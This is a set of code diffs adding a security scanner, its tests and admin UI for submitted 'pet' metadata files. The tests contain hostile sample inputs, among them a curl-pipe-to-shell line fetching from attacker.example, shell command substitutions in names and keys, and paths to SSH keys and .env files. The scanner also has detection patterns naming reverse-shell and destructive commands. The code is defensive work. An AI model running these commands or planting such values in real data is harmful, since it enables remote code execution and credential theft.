+    else if (arg === "--timeout-ms")
+      out.timeoutMs = readNumber(argv[++index], out.timeoutMs);
+    else if (arg === "--retries")
+      out.retries = readNonNegativeNumber(argv[++index], out.retries);
+    else if (arg === "--delay-ms")
+      out.delayMs = readNonNegativeNumber(argv[++index], out.delayMs);
+    else if (arg === "--concurrency") {
+      out.concurrency = Math.min(
+        Math.max(readNumber(argv[++index], out.concurrency), 1),
+        32,
+      );
+    } else if (arg === "--slug") {
+      out.slug = argv[++index] ?? null;
+    } else if (arg === "--manifest-url") {
+      out.manifestUrl = argv[++index] ?? null;
+    }
+  }
+  return out;
+}
+
+function readNumber(value: string | undefined, fallback: number): number {
+  const parsed = Number(value);
+  return Number.isFinite(parsed) && parsed > 0 ? Math.floor(parsed) : fallback;
+}
+
+function readNonNegativeNumber(
+  value: string | undefined,
+  fallback: number,
+): number {
+  const parsed = Number(value);
+  return Number.isFinite(parsed) && parsed >= 0 ? Math.floor(parsed) : fallback;
+}
+
+function log(message: string) {
+  if (!args.json) console.log(message);
+}
+
+async function getDb() {
+  return (await import("@/lib/db/runtime")).runtimeDb;
+}
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function stringField(value: unknown): string | null {
+  return typeof value === "string" && value.trim() ? value : null;
+}
+
+function requiredStringField(value: unknown, path: string): string {
+  const field = stringField(value);
+  if (!field) throw new Error(`${path} is missing`);
+  return field;
+}
+
+function shouldRetryStatus(status: number): boolean {
+  return status === 429 || status >= 500;
+}
+
+function retryDelayMs(attempt: number, headers?: Headers): number {
+  const retryAfter = headers?.get("retry-after");
+  if (retryAfter) {
+    const seconds = Number(retryAfter);
+    if (Number.isFinite(seconds) && seconds > 0) {
+      return Math.min(seconds * 1000, 4_000);
+    }
+  }
+  return Math.min(500 * 2 ** attempt, 4_000);
+}
+
+function sleep(ms: number): Promise<void> {
+  return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+main().catch((error) => {
+  console.error(error);
+  process.exit(1);
+});

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -317,14 +317,47 @@ async function fetchZipPetJson(
     if (names.length > 1) {
       return { ok: false, reason: "zip contains multiple pet.json files" };
     }
-    const raw = await archive.files[names[0]].async("string");
-    return { ok: true, petJson: JSON.parse(raw) };
+    return await readZipPetJson(archive.files[names[0]], MAX_PET_JSON_BYTES);
   } catch (error) {
     return {
       ok: false,
       reason: error instanceof Error ? error.message : String(error),
     };
   }
+}
+
+type ZipEntryWithData = JSZip.JSZipObject & {
+  _data?: { uncompressedSize?: unknown };
+};
+
+async function readZipPetJson(
+  entry: JSZip.JSZipObject,
+  maxBytes: number,
+): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+  const size = zipEntryUncompressedSize(entry);
+  if (size === null) {
+    return { ok: false, reason: "zip pet.json size could not be verified" };
+  }
+  if (size > maxBytes) {
+    return { ok: false, reason: "zip pet.json exceeds maximum audit size" };
+  }
+  try {
+    const bytes = Buffer.from(await entry.async("uint8array"));
+    if (bytes.byteLength > maxBytes) {
+      return { ok: false, reason: "zip pet.json exceeds maximum audit size" };
+    }
+    return { ok: true, petJson: JSON.parse(bytes.toString("utf8")) };
+  } catch (error) {
+    return {
+      ok: false,
+      reason: error instanceof Error ? error.message : String(error),
+    };
+  }
+}
+
+function zipEntryUncompressedSize(entry: JSZip.JSZipObject): number | null {
+  const size = (entry as ZipEntryWithData)._data?.uncompressedSize;
+  return typeof size === "number" && Number.isFinite(size) ? size : null;
 }
 
 async function fetchBuffer(

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -4,6 +4,7 @@ import JSZip from "jszip";
 import * as schema from "@/lib/db/schema";
 import {
   type PetSecurityScan,
+  petSecurityReason,
   scanPetManifestsSecurity,
   scanPetSecurity,
 } from "@/lib/pet-security";
@@ -276,7 +277,7 @@ async function maybeApplySecurityRejection(
     {
       action: "reject",
       reason:
-        scan.reasons[0] ??
+        petSecurityReason(scan, "fail") ??
         "Pet metadata contains a high-confidence executable payload.",
     },
     { actor: "auto-review", db: actionDb, skipSideEffects: !args.notify },
@@ -437,7 +438,7 @@ async function recordSecurityReview(
     decision: "auto_reject",
     reasonCode: "security_malicious_pet_json",
     summary:
-      scan.reasons[0] ??
+      petSecurityReason(scan, "fail") ??
       "Pet metadata contains a high-confidence executable payload.",
     confidence: 100,
     checks,

--- a/src/components/admin-review-row.tsx
+++ b/src/components/admin-review-row.tsx
@@ -599,6 +599,20 @@ function AutomationEvidence({ review }: { review: SubmissionReview | null }) {
             items={checks.assets.reasons}
           />
         ) : null}
+        {checks.security?.findings?.length ? (
+          <EvidenceGroup
+            title={t("evidenceSecurity")}
+            items={checks.security.findings.map(
+              (finding) =>
+                `${finding.code} (${finding.path}): ${finding.evidence}`,
+            )}
+          />
+        ) : checks.security?.reasons?.length ? (
+          <EvidenceGroup
+            title={t("evidenceSecurity")}
+            items={checks.security.reasons}
+          />
+        ) : null}
         {checks.policy?.flags?.length ? (
           <EvidenceGroup
             title={t("evidencePolicy")}

--- a/src/i18n/messages/en.json
+++ b/src/i18n/messages/en.json
@@ -1651,6 +1651,7 @@
     "noSummary": "No summary.",
     "confidence": "Confidence: {confidence}%.",
     "evidenceAssets": "Assets",
+    "evidenceSecurity": "Security",
     "evidencePolicy": "Policy",
     "evidenceVisualText": "Visual text",
     "evidenceVisualSignals": "Visual signals"

--- a/src/i18n/messages/es.json
+++ b/src/i18n/messages/es.json
@@ -1651,6 +1651,7 @@
     "noSummary": "Sin resumen.",
     "confidence": "Confianza: {confidence}%.",
     "evidenceAssets": "Archivos",
+    "evidenceSecurity": "Seguridad",
     "evidencePolicy": "Política",
     "evidenceVisualText": "Texto visual",
     "evidenceVisualSignals": "Señales visuales"

--- a/src/i18n/messages/zh.json
+++ b/src/i18n/messages/zh.json
@@ -1888,6 +1888,7 @@
     "noSummary": "暂无摘要。",
     "confidence": "置信度：{confidence}%。",
     "evidenceAssets": "素材",
+    "evidenceSecurity": "安全",
     "evidencePolicy": "政策",
     "evidenceVisualText": "图中文字",
     "evidenceVisualSignals": "视觉信号"

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -1,0 +1,79 @@
+import { describe, expect, it } from "bun:test";
+
+import { scanPetSecurity } from "@/lib/pet-security";
+
+describe("scanPetSecurity", () => {
+  it("passes normal pet metadata", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        id: "boba",
+        displayName: "Boba",
+        description: "A tiny companion.",
+        spritesheetPath: "spritesheet.webp",
+        states: {
+          idle: { row: 0, frames: 8 },
+        },
+      },
+      displayName: "Boba",
+      description: "A tiny companion.",
+    });
+
+    expect(result.decision).toBe("pass");
+    expect(result.findings).toEqual([]);
+  });
+
+  it("fails shell command substitution payloads", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba $(touch /tmp/pwned)",
+        spritesheetPath: "spritesheet.webp",
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings[0]?.code).toBe("shell_command_substitution");
+    expect(result.findings[0]?.severity).toBe("fail");
+    expect(result.findings[0]?.path).toBe("$.displayName");
+  });
+
+  it("fails executable metadata keys", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        command: "curl https://attacker.example/p.sh | sh",
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "executable_metadata_key",
+    );
+  });
+
+  it("holds external URLs without auto-rejecting", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        homepage: "https://example.com/boba",
+      },
+    });
+
+    expect(result.decision).toBe("hold");
+    expect(result.findings[0]?.code).toBe("external_url_in_pet_json");
+    expect(result.findings[0]?.severity).toBe("hold");
+  });
+
+  it("fails path traversal in path-like keys", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        spritesheetPath: "../secrets/.env",
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "path_traversal",
+    );
+  });
+});

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -104,6 +104,33 @@ describe("scanPetSecurity", () => {
     );
   });
 
+  it("holds credential references in free-text descriptions", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        description: "No .env file is included and localStorage is unused.",
+      },
+    });
+
+    expect(result.decision).toBe("hold");
+    expect(result.findings[0]?.severity).toBe("hold");
+    expect(result.findings[0]?.code).toBe("credential_exfiltration_reference");
+  });
+
+  it("fails credential references in structured metadata", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        spritesheetPath: "~/.ssh/id_rsa",
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "credential_exfiltration_reference",
+    );
+  });
+
   it("redacts sensitive values from findings and reasons", () => {
     const result = scanPetSecurity({
       petJson: {

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -186,6 +186,38 @@ describe("scanPetSecurity", () => {
     expect(serialized).toContain("[redacted secret]");
   });
 
+  it("detects sensitive env-style keys with token-shaped values", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        OPENAI_API_KEY: "sk-proj-real-secret-token",
+        openaiApiKey: "sk-live-real-secret-token",
+      },
+    });
+    const serialized = JSON.stringify(result);
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "credential_exfiltration_reference",
+    );
+    expect(serialized).not.toContain("sk-proj-real-secret-token");
+    expect(serialized).not.toContain("sk-live-real-secret-token");
+  });
+
+  it("fails command payloads in object keys", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        states: {
+          "$(touch /tmp/pwned)": { row: 0 },
+        },
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "shell_command_substitution",
+    );
+  });
+
   it("keeps fail decisions after the visible findings cap is reached", () => {
     const result = scanPetSecurity({
       petJson: {

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -63,6 +63,29 @@ describe("scanPetSecurity", () => {
     expect(result.findings[0]?.path).toBe("$.displayName");
   });
 
+  it("allows harmless backticks in free-text descriptions", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        description: "Uses `pet.json` and `spritesheet.webp`.",
+      },
+    });
+
+    expect(result.decision).toBe("pass");
+    expect(result.findings).toEqual([]);
+  });
+
+  it("fails shell-like backtick command substitutions", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "`touch /tmp/pwned`",
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings[0]?.code).toBe("shell_command_substitution");
+  });
+
   it("fails executable metadata keys", () => {
     const result = scanPetSecurity({
       petJson: {

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -22,6 +22,33 @@ describe("scanPetSecurity", () => {
     expect(result.findings).toEqual([]);
   });
 
+  it("allows free-text file labels in submitted metadata", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        spritesheetPath: "spritesheet.webp",
+      },
+      description: "source file: spritesheet.webp",
+    });
+
+    expect(result.decision).toBe("pass");
+    expect(result.findings).toEqual([]);
+  });
+
+  it("fails real active script URLs", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        displayName: "Boba",
+        homepage: "file:///tmp/pwned",
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "active_script_url",
+    );
+  });
+
   it("fails shell command substitution payloads", () => {
     const result = scanPetSecurity({
       petJson: {
@@ -91,6 +118,22 @@ describe("scanPetSecurity", () => {
     expect(serialized).not.toContain("OPENAI_API_KEY");
     expect(serialized).not.toContain("touch /tmp/pwned");
     expect(serialized).toContain("[redacted]");
+  });
+
+  it("redacts token-shaped values from non-sensitive findings", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        description: "sk-proj-real-secret-token $(touch /tmp/pwned)",
+      },
+    });
+    const serialized = JSON.stringify(result);
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "shell_command_substitution",
+    );
+    expect(serialized).not.toContain("sk-proj-real-secret-token");
+    expect(serialized).toContain("[redacted secret]");
   });
 
   it("keeps fail decisions after the visible findings cap is reached", () => {

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -1,6 +1,6 @@
 import { describe, expect, it } from "bun:test";
 
-import { scanPetSecurity } from "@/lib/pet-security";
+import { scanPetManifestsSecurity, scanPetSecurity } from "@/lib/pet-security";
 
 describe("scanPetSecurity", () => {
   it("passes normal pet metadata", () => {
@@ -90,5 +90,35 @@ describe("scanPetSecurity", () => {
     expect(serialized).not.toContain("sk-live-real-secret-value");
     expect(serialized).not.toContain("OPENAI_API_KEY");
     expect(serialized).toContain("[redacted]");
+  });
+
+  it("fails malicious zip pet.json even when standalone pet.json is clean", () => {
+    const result = scanPetManifestsSecurity({
+      petJson: { displayName: "Boba", states: { idle: { row: 0 } } },
+      zipPetJson: {
+        displayName: "Boba $(touch /tmp/pwned)",
+        states: { idle: { row: 0 } },
+      },
+    });
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.path)).toContain(
+      "zip.petJson.displayName",
+    );
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "pet_json_manifest_mismatch",
+    );
+  });
+
+  it("holds when standalone and zip pet manifests differ", () => {
+    const result = scanPetManifestsSecurity({
+      petJson: { displayName: "Boba", states: { idle: { row: 0 } } },
+      zipPetJson: { displayName: "Boba", states: { idle: { row: 1 } } },
+    });
+
+    expect(result.decision).toBe("hold");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "pet_json_manifest_mismatch",
+    );
   });
 });

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -80,7 +80,7 @@ describe("scanPetSecurity", () => {
   it("redacts sensitive values from findings and reasons", () => {
     const result = scanPetSecurity({
       petJson: {
-        apiKey: "sk-live-real-secret-value",
+        apiKey: "sk-live-real-secret-value $(touch /tmp/pwned)",
         description: "reads process.env.OPENAI_API_KEY",
       },
     });
@@ -89,7 +89,23 @@ describe("scanPetSecurity", () => {
     expect(result.decision).toBe("fail");
     expect(serialized).not.toContain("sk-live-real-secret-value");
     expect(serialized).not.toContain("OPENAI_API_KEY");
+    expect(serialized).not.toContain("touch /tmp/pwned");
     expect(serialized).toContain("[redacted]");
+  });
+
+  it("keeps fail decisions after the visible findings cap is reached", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        links: Array.from(
+          { length: 30 },
+          (_, index) => `https://example.com/${index}`,
+        ),
+        displayName: "Boba $(touch /tmp/pwned)",
+      },
+    });
+
+    expect(result.findings).toHaveLength(24);
+    expect(result.decision).toBe("fail");
   });
 
   it("fails malicious zip pet.json even when standalone pet.json is clean", () => {

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -203,6 +203,21 @@ describe("scanPetSecurity", () => {
     expect(serialized).not.toContain("sk-live-real-secret-token");
   });
 
+  it("fails token-shaped values in camelCase sensitive keys", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        openaiApiKey: "sk-live-real-secret-token",
+      },
+    });
+    const serialized = JSON.stringify(result);
+
+    expect(result.decision).toBe("fail");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "secret_token_value",
+    );
+    expect(serialized).not.toContain("sk-live-real-secret-token");
+  });
+
   it("fails command payloads in object keys", () => {
     const result = scanPetSecurity({
       petJson: {

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -76,4 +76,19 @@ describe("scanPetSecurity", () => {
       "path_traversal",
     );
   });
+
+  it("redacts sensitive values from findings and reasons", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        apiKey: "sk-live-real-secret-value",
+        description: "reads process.env.OPENAI_API_KEY",
+      },
+    });
+    const serialized = JSON.stringify(result);
+
+    expect(result.decision).toBe("fail");
+    expect(serialized).not.toContain("sk-live-real-secret-value");
+    expect(serialized).not.toContain("OPENAI_API_KEY");
+    expect(serialized).toContain("[redacted]");
+  });
 });

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -149,6 +149,12 @@ describe("scanPetSecurity", () => {
 
     expect(result.findings).toHaveLength(24);
     expect(result.decision).toBe("fail");
+    expect(result.findings.some((finding) => finding.severity === "fail")).toBe(
+      true,
+    );
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "shell_command_substitution",
+    );
   });
 
   it("fails malicious zip pet.json even when standalone pet.json is clean", () => {
@@ -166,6 +172,26 @@ describe("scanPetSecurity", () => {
     );
     expect(result.findings.map((finding) => finding.code)).toContain(
       "pet_json_manifest_mismatch",
+    );
+  });
+
+  it("holds instead of throwing when manifest comparison exceeds safety limits", () => {
+    const deepPetJson: Record<string, unknown> = { displayName: "Boba" };
+    let cursor = deepPetJson;
+    for (let index = 0; index < 2000; index++) {
+      const next: Record<string, unknown> = {};
+      cursor.child = next;
+      cursor = next;
+    }
+
+    const result = scanPetManifestsSecurity({
+      petJson: deepPetJson,
+      zipPetJson: { displayName: "Boba" },
+    });
+
+    expect(result.decision).toBe("hold");
+    expect(result.findings.map((finding) => finding.code)).toContain(
+      "pet_json_manifest_comparison_limit",
     );
   });
 

--- a/src/lib/pet-security.test.ts
+++ b/src/lib/pet-security.test.ts
@@ -233,6 +233,19 @@ describe("scanPetSecurity", () => {
     );
   });
 
+  it("redacts token-shaped object keys from stored paths", () => {
+    const result = scanPetSecurity({
+      petJson: {
+        "sk-live-real-secret-token": "$(touch /tmp/pwned)",
+      },
+    });
+    const serialized = JSON.stringify(result);
+
+    expect(result.decision).toBe("fail");
+    expect(serialized).not.toContain("sk-live-real-secret-token");
+    expect(serialized).toContain("redactedKey");
+  });
+
   it("keeps fail decisions after the visible findings cap is reached", () => {
     const result = scanPetSecurity({
       petJson: {

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -335,6 +335,10 @@ export function petSecurityReason(
   return scan.reasons[0] ?? null;
 }
 
+export function petSecurityPathSegment(value: string): string {
+  return isUnsafePathSegment(value) ? "redactedKey" : value;
+}
+
 function prefixFindings(
   findings: PetSecurityFinding[],
   prefix: string,
@@ -349,9 +353,10 @@ function prefixFindings(
 }
 
 function joinPath(parent: string, key: string): string {
-  return /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(key)
-    ? `${parent}.${key}`
-    : `${parent}[${JSON.stringify(key)}]`;
+  const segment = petSecurityPathSegment(key);
+  return /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(segment)
+    ? `${parent}.${segment}`
+    : `${parent}[${JSON.stringify(segment)}]`;
 }
 
 function isPlainRecord(value: unknown): value is Record<string, unknown> {
@@ -388,6 +393,13 @@ function isSensitiveKey(key: string): boolean {
   );
 }
 
+function isUnsafePathSegment(value: string): boolean {
+  if (hasTokenValue(value)) return true;
+  if (credentialReferenceRe.test(value)) return true;
+  if (hasBlockedControlCharacter(value)) return true;
+  return failPatterns.some((pattern) => pattern.re.test(value));
+}
+
 function hasTokenValue(value: string): boolean {
   tokenValueRe.lastIndex = 0;
   return tokenValueRe.test(value);
@@ -395,7 +407,7 @@ function hasTokenValue(value: string): boolean {
 
 function redactEvidence(code: string, evidence: string, key?: string): string {
   if (key && isSensitiveKey(key)) {
-    return `${key}: [redacted]`;
+    return `${petSecurityPathSegment(key)}: [redacted]`;
   }
   if (
     code === "credential_exfiltration_reference" ||
@@ -405,7 +417,9 @@ function redactEvidence(code: string, evidence: string, key?: string): string {
   }
   if (code === "sensitive_metadata_key") {
     const key = evidence.split(":")[0]?.trim();
-    return key ? `${key}: [redacted]` : "[redacted sensitive value]";
+    return key
+      ? `${petSecurityPathSegment(key)}: [redacted]`
+      : "[redacted sensitive value]";
   }
   tokenValueRe.lastIndex = 0;
   return evidence.replace(tokenValueRe, "[redacted secret]");

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -19,6 +19,10 @@ type ScanInput = {
   description?: string | null;
 };
 
+type ManifestScanInput = ScanInput & {
+  zipPetJson?: unknown;
+};
+
 const MAX_FINDINGS = 24;
 const MAX_DEPTH = 12;
 const MAX_NODES = 3000;
@@ -207,6 +211,73 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
   };
 }
 
+export function scanPetManifestsSecurity(
+  input: ManifestScanInput,
+): PetSecurityScan {
+  const findings = [
+    ...prefixFindings(
+      scanPetSecurity({ petJson: input.petJson }).findings,
+      "petJsonUrl",
+    ),
+    ...prefixFindings(
+      scanPetSecurity({
+        petJson: {},
+        displayName: input.displayName,
+        description: input.description,
+      }).findings,
+      "submitted",
+    ),
+  ];
+
+  if (input.zipPetJson !== undefined) {
+    findings.push(
+      ...prefixFindings(
+        scanPetSecurity({ petJson: input.zipPetJson }).findings,
+        "zip.petJson",
+      ),
+    );
+    if (stableJson(input.petJson) !== stableJson(input.zipPetJson)) {
+      findings.push({
+        code: "pet_json_manifest_mismatch",
+        severity: "hold",
+        path: "zip.petJson",
+        evidence: "zip pet.json differs from standalone petJsonUrl",
+      });
+    }
+  }
+
+  return scanFromFindings(findings);
+}
+
+function scanFromFindings(findings: PetSecurityFinding[]): PetSecurityScan {
+  const hasFail = findings.some((finding) => finding.severity === "fail");
+  const hasHold = findings.some((finding) => finding.severity === "hold");
+  const decision: ReviewCheckDecision = hasFail
+    ? "fail"
+    : hasHold
+      ? "hold"
+      : "pass";
+
+  return {
+    decision,
+    reasons: findings.map((finding) => `${finding.code}: ${finding.evidence}`),
+    findings,
+  };
+}
+
+function prefixFindings(
+  findings: PetSecurityFinding[],
+  prefix: string,
+): PetSecurityFinding[] {
+  return findings.map((finding) => ({
+    ...finding,
+    path:
+      finding.path === "$"
+        ? prefix
+        : `${prefix}${finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
+  }));
+}
+
 function joinPath(parent: string, key: string): string {
   return /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(key)
     ? `${parent}.${key}`
@@ -239,4 +310,15 @@ function redactEvidence(code: string, evidence: string): string {
     return key ? `${key}: [redacted]` : "[redacted sensitive value]";
   }
   return evidence;
+}
+
+function stableJson(value: unknown): string {
+  if (Array.isArray(value)) return `[${value.map(stableJson).join(",")}]`;
+  if (isPlainRecord(value)) {
+    return `{${Object.keys(value)
+      .sort()
+      .map((key) => `${JSON.stringify(key)}:${stableJson(value[key])}`)
+      .join(",")}}`;
+  }
+  return JSON.stringify(value);
 }

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -161,7 +161,13 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
       );
     }
     if (hasTokenValue(value)) {
-      add("hold", "secret_token_value", path, value, key);
+      add(
+        key && isSensitiveKey(key) ? "fail" : "hold",
+        "secret_token_value",
+        path,
+        value,
+        key,
+      );
     }
     for (const pattern of holdPatterns) {
       if (pattern.re.test(value)) add("hold", pattern.code, path, value, key);

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -35,6 +35,8 @@ const executableKey =
   /^(command|cmd|exec|shell|script|scripts|postinstall|preinstall|installcommand|hook|hooks|launchagent|plist)$/i;
 const sensitiveKey =
   /^(apikey|api_key|authtoken|auth_token|secret|token|env|envfile|env_file)$/i;
+const freeTextKey =
+  /^(displayname|display_name|name|title|description|summary|bio|notes?|author)$/i;
 const credentialReferenceRe =
   /(?:~\/\.ssh|\/\.ssh\/|id_rsa|id_ed25519|\.env\b|OPENAI_API_KEY|ANTHROPIC_API_KEY|GITHUB_TOKEN|CLERK_SECRET_KEY|process\.env|document\.cookie|localStorage)/i;
 const tokenValueRe =
@@ -60,10 +62,6 @@ const failPatterns: Array<{ code: string; re: RegExp }> = [
   {
     code: "destructive_shell_command",
     re: /\b(?:rm\s+-rf|chmod\s+\+x|chown\s+|launchctl\s+(?:load|bootstrap)|crontab\s+-|nc\s+-e|mkfifo\s+)\b/i,
-  },
-  {
-    code: "credential_exfiltration_reference",
-    re: credentialReferenceRe,
   },
   {
     code: "active_script_url",
@@ -148,6 +146,15 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
 
     for (const pattern of failPatterns) {
       if (pattern.re.test(value)) add("fail", pattern.code, path, value, key);
+    }
+    if (credentialReferenceRe.test(value)) {
+      add(
+        isFreeTextField(path, key) ? "hold" : "fail",
+        "credential_exfiltration_reference",
+        path,
+        value,
+        key,
+      );
     }
     for (const pattern of holdPatterns) {
       if (pattern.re.test(value)) add("hold", pattern.code, path, value, key);
@@ -303,6 +310,17 @@ function scanFromFindings(
   };
 }
 
+export function petSecurityReason(
+  scan: PetSecurityScan,
+  preferredSeverity?: PetSecurityFinding["severity"],
+): string | null {
+  const finding = preferredSeverity
+    ? scan.findings.find((finding) => finding.severity === preferredSeverity)
+    : scan.findings[0];
+  if (finding) return `${finding.code}: ${finding.evidence}`;
+  return scan.reasons[0] ?? null;
+}
+
 function prefixFindings(
   findings: PetSecurityFinding[],
   prefix: string,
@@ -337,6 +355,14 @@ function hasBlockedControlCharacter(value: string): boolean {
     if (code === 0 || code === 27 || code === 127) return true;
   }
   return false;
+}
+
+function isFreeTextField(path: string, key?: string): boolean {
+  return (
+    path === "submitted.displayName" ||
+    path === "submitted.description" ||
+    (key !== undefined && freeTextKey.test(key))
+  );
 }
 
 function redactEvidence(code: string, evidence: string, key?: string): string {

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -33,6 +33,8 @@ const executableKey =
   /^(command|cmd|exec|shell|script|scripts|postinstall|preinstall|installcommand|hook|hooks|launchagent|plist)$/i;
 const sensitiveKey =
   /^(apikey|api_key|authtoken|auth_token|secret|token|env|envfile|env_file)$/i;
+const credentialReferenceRe =
+  /(?:~\/\.ssh|\/\.ssh\/|id_rsa|id_ed25519|\.env\b|OPENAI_API_KEY|ANTHROPIC_API_KEY|GITHUB_TOKEN|CLERK_SECRET_KEY|process\.env|document\.cookie|localStorage)/i;
 
 const failPatterns: Array<{ code: string; re: RegExp }> = [
   {
@@ -57,7 +59,7 @@ const failPatterns: Array<{ code: string; re: RegExp }> = [
   },
   {
     code: "credential_exfiltration_reference",
-    re: /(?:~\/\.ssh|\/\.ssh\/|id_rsa|id_ed25519|\.env\b|OPENAI_API_KEY|ANTHROPIC_API_KEY|GITHUB_TOKEN|CLERK_SECRET_KEY|process\.env|document\.cookie|localStorage)/i,
+    re: credentialReferenceRe,
   },
   {
     code: "active_script_url",
@@ -82,6 +84,8 @@ const holdPatterns: Array<{ code: string; re: RegExp }> = [
 
 export function scanPetSecurity(input: ScanInput): PetSecurityScan {
   const findings: PetSecurityFinding[] = [];
+  let hasFail = false;
+  let hasHold = false;
   let nodes = 0;
 
   const add = (
@@ -89,9 +93,11 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
     code: string,
     path: string,
     evidence: string,
+    key?: string,
   ) => {
-    if (findings.length >= MAX_FINDINGS) return;
-    const clipped = redactEvidence(code, evidence)
+    if (severity === "fail") hasFail = true;
+    if (severity === "hold") hasHold = true;
+    const clipped = redactEvidence(code, evidence, key)
       .replace(/\s+/g, " ")
       .trim()
       .slice(0, 220);
@@ -105,36 +111,43 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
     ) {
       return;
     }
+    if (findings.length >= MAX_FINDINGS) return;
     findings.push({ severity, code, path, evidence: clipped });
   };
 
   const scanText = (path: string, value: string, key?: string) => {
     if (value.length > MAX_STRING_LENGTH) {
-      add("hold", "large_string_value", path, `String length ${value.length}`);
+      add(
+        "hold",
+        "large_string_value",
+        path,
+        `String length ${value.length}`,
+        key,
+      );
     }
     if (hasBlockedControlCharacter(value)) {
-      add("fail", "control_character_payload", path, value);
+      add("fail", "control_character_payload", path, value, key);
     }
 
     for (const pattern of failPatterns) {
-      if (pattern.re.test(value)) add("fail", pattern.code, path, value);
+      if (pattern.re.test(value)) add("fail", pattern.code, path, value, key);
     }
     for (const pattern of holdPatterns) {
-      if (pattern.re.test(value)) add("hold", pattern.code, path, value);
+      if (pattern.re.test(value)) add("hold", pattern.code, path, value, key);
     }
 
     if (key && executableKey.test(key) && value.trim()) {
-      add("fail", "executable_metadata_key", path, `${key}: ${value}`);
+      add("fail", "executable_metadata_key", path, `${key}: ${value}`, key);
     }
     if (key && sensitiveKey.test(key) && value.trim()) {
-      add("hold", "sensitive_metadata_key", path, `${key}: ${value}`);
+      add("hold", "sensitive_metadata_key", path, `${key}: ${value}`, key);
     }
     if (key && /path$/i.test(key)) {
       if (/^\s*(?:\/|~\/|[a-z]:\\|\\\\|https?:\/\/)/i.test(value)) {
-        add("hold", "absolute_or_remote_path", path, `${key}: ${value}`);
+        add("hold", "absolute_or_remote_path", path, `${key}: ${value}`, key);
       }
       if (/(?:^|[\\/])\.\.(?:[\\/]|$)/.test(value)) {
-        add("fail", "path_traversal", path, `${key}: ${value}`);
+        add("fail", "path_traversal", path, `${key}: ${value}`, key);
       }
     }
   };
@@ -196,8 +209,6 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
   if (input.displayName) scanText("submitted.displayName", input.displayName);
   if (input.description) scanText("submitted.description", input.description);
 
-  const hasFail = findings.some((finding) => finding.severity === "fail");
-  const hasHold = findings.some((finding) => finding.severity === "hold");
   const decision: ReviewCheckDecision = hasFail
     ? "fail"
     : hasHold
